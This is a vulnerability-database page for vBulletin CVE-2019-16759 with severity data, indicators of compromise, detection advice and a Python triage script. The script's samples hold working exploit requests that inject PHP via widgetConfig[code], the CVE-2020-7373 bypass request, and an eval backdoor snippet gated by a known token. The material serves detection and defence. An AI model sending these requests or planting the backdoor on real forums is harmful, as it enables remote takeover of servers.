cbcvebase.
CVE-2019-16759
published 2019-09-24

CVE-2019-16759: vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.

Priority: P1
CVSS 3.1: 9.8 (critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability (remediation due 2022-05-03)
Exploited in the wild
EPSS: 99.73% (100.0th percentile)

Affected (2 ranges)

Vendor      Product     Version range    Fixed in
vbulletin   vbulletin   5.0.0 – 5.5.4    (not listed)
vbulletin   vbulletin   5.5.4 – 5.6.2    (not listed)

Detection & IOCs (extracted from sources)

url        /index.php?routestring=ajax/render/widget_php
path       ajax/render/widget_php
parameter  epass=2dmfrb28nu3c6s9j  (access token of the implanted backdoor)
path       includes/vb5/frontend/controller/bbcode.php  (file overwritten with the backdoor)
command    die(@md5(HellovBulletin))  (verification payload commonly sent in widgetConfig[code])
signature  Threat Prevention Signature 56632
signature  Threat Prevention Signature 56627
  • Detect POST requests to /index.php whose routestring parameter is 'ajax/render/widget_php'; this is the canonical exploit path for CVE-2019-16759. The parameter can travel in the query string or in the POST body, so a rule that only reads the query string misses body-carried requests, and a plain access log (which never records bodies) is not a sufficient source on its own.
  • Inspect the POST body for the 'widgetConfig[code]' parameter carrying PHP code (shell_exec, system, eval and similar calls). This parameter is the injection vector: the widget template evaluates it as PHP server-side, which is the RCE.
  • Monitor for unauthorized modifications to includes/vb5/frontend/controller/bbcode.php; attackers overwrote this file to implant a backdoor gated by the 'epass' request parameter. A file-integrity baseline of the shipped vBulletin tree makes such an overwrite visible.
  • Detect HTTP requests containing the 'epass' parameter with value '2dmfrb28nu3c6s9j', the authentication token of the backdoor implanted in compromised vBulletin instances. A hit indicates post-compromise access rather than an exploit attempt, so treat it as an incident, not a blocked probe.
  • The Check Point IPS blade signature 'vBulletin Forum Remote Code Execution (CVE-2019-16759)' can be used as a reference for IPS/IDS rule naming and tuning.
  • The vulnerability only triggers when PHP rendering is enabled in vBulletin's administration panel; disabling PHP, Static HTML and Ad Module rendering mitigates the attack without patching. This is a stopgap that breaks any widget relying on those modules, and the vendor patch should still be applied.
  • CVE-2020-7373 (vBulletin 5.5.4 to 5.6.2, reached through subWidgets in the widget_tabbedcontainer_tab_panel template) bypasses the incomplete fix for CVE-2019-16759. A detection keyed only on routestring=ajax/render/widget_php does not see this variant: the route is widget_tabbedcontainer_tab_panel and the PHP arrives in subWidgets[...][config][code] with subWidgets[...][template]=widget_php.
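The detection points above, turned into a small triage script. This is an added example, not code from cvebase or vBulletin: it assumes the log source keeps full request bodies (a WAF, reverse proxy or mod_security audit log) and that rewrite-based installs may expose /ajax/render/widget_php as a bare path. The sample requests and the backdoored PHP snippet are constructed for the example, modelled on the IOC list, not captured data; the indicators themselves (route, parameter names, epass token, file path) are the page's.

```python
"""Triage helper for the CVE-2019-16759 / CVE-2020-7373 exploit shape.

Added example, not code from cvebase or vBulletin. Assumes the log source
keeps full request bodies; a plain access log never shows widgetConfig[code],
so there only the query-string routestring check can fire.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Indicators taken from the advisory text above.
EXPLOIT_ROUTE = "ajax/render/widget_php"      # CVE-2019-16759 route
BACKDOOR_TOKEN = "2dmfrb28nu3c6s9j"           # epass value of the bbcode.php backdoor
SUBWIDGET_RE = re.compile(r"^subWidgets\[\d+\]\[(template|config)\]")  # CVE-2020-7373 keys
# Calls seen in injected payloads; "die" also catches the md5 verification probe.
PHP_CALL_RE = re.compile(
    r"\b(shell_exec|system|exec|passthru|popen|eval|assert|die)\s*\(", re.I)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, params).

    Query-string and body parameters are merged because vBulletin reads
    routestring from either. Bracketed keys such as widgetConfig[code] come
    out of parse_qsl unchanged (percent-encoded brackets are decoded).
    """
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    parts = urlsplit(target)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    params.update(parse_qsl(body, keep_blank_values=True))
    return method, parts.path, params


def classify(raw):
    """Return the list of findings for one request (empty list = nothing matched)."""
    _method, path, params = parse_request(raw)
    findings = []

    # 1. Canonical exploit route, whether routestring is in the query or the body.
    #    Assumption: rewrite-based installs may route the bare path without index.php.
    if params.get("routestring") == EXPLOIT_ROUTE or path.endswith("/" + EXPLOIT_ROUTE):
        findings.append("CVE-2019-16759 route: " + EXPLOIT_ROUTE)

    # 2. The injected parameter itself; record which PHP call it carries, if any.
    code = params.get("widgetConfig[code]")
    if code is not None:
        m = PHP_CALL_RE.search(code)
        findings.append("widgetConfig[code] present"
                        + (" with PHP call: " + m.group(1).lower() if m else ""))

    # 3. CVE-2020-7373: widget_php loaded indirectly through a tabbed container's subWidgets.
    templates = [v for k, v in params.items()
                 if SUBWIDGET_RE.match(k) and k.endswith("[template]")]
    if "widget_php" in templates:
        findings.append("CVE-2020-7373 variant: subWidgets template widget_php")

    # 4. Post-compromise access through the implanted backdoor.
    if params.get("epass") == BACKDOOR_TOKEN:
        findings.append("epass backdoor token (post-compromise access)")
    return findings


def php_backdoor_indicators(source):
    """Flag PHP source (e.g. includes/vb5/frontend/controller/bbcode.php) that
    gates code on the epass parameter or embeds the known token."""
    hits = []
    if re.search(r"\$_(REQUEST|GET|POST)\s*\[\s*['\"]epass['\"]\s*\]", source):
        hits.append("reads epass parameter")
    if BACKDOOR_TOKEN in source:
        hits.append("contains known token " + BACKDOOR_TOKEN)
    return hits


# Constructed sample traffic (not captured data), form-encoded as public PoCs send it.
SAMPLES = {
    "exploit": ("POST /index.php?routestring=ajax/render/widget_php HTTP/1.1\r\n"
                "Host: forum.example\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                "widgetConfig%5Bcode%5D=echo+shell_exec%28%27id%27%29%3B+exit%3B"),
    "probe":   ("POST /index.php HTTP/1.1\r\nHost: forum.example\r\n\r\n"
                "routestring=ajax/render/widget_php"
                "&widgetConfig[code]=die(@md5(HellovBulletin))"),
    "bypass":  ("POST /index.php HTTP/1.1\r\nHost: forum.example\r\n\r\n"
                "routestring=ajax/render/widget_tabbedcontainer_tab_panel"
                "&subWidgets[0][template]=widget_php"
                "&subWidgets[0][config][code]=echo+shell_exec%28%27id%27%29%3B+exit%3B"),
    "backdoor": "GET /index.php?epass=2dmfrb28nu3c6s9j HTTP/1.1\r\nHost: forum.example\r\n\r\n",
    "benign":   "GET /index.php?routestring=forum/general HTTP/1.1\r\nHost: forum.example\r\n\r\n",
}

# Constructed snippet modelled on the bbcode.php bullet above; not the real implant.
BACKDOORED_PHP = ("<?php if (isset($_REQUEST['epass']) && $_REQUEST['epass'] == "
                  "'2dmfrb28nu3c6s9j') { eval($_REQUEST['c']); }")

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:9s} -> {classify(raw) or 'clean'}")
    print("bbcode.php ->", php_backdoor_indicators(BACKDOORED_PHP))
```

Findings are returned as a list rather than a boolean so the caller can separate exploit attempts (route and widgetConfig[code] hits), the 5.5.4 to 5.6.2 bypass (subWidgets hit, which the route check alone never sees), and post-compromise access (epass hit), since each warrants a different response.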

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck   -         9.8     CRITICAL   -
cisa        -         9.8     CRITICAL   -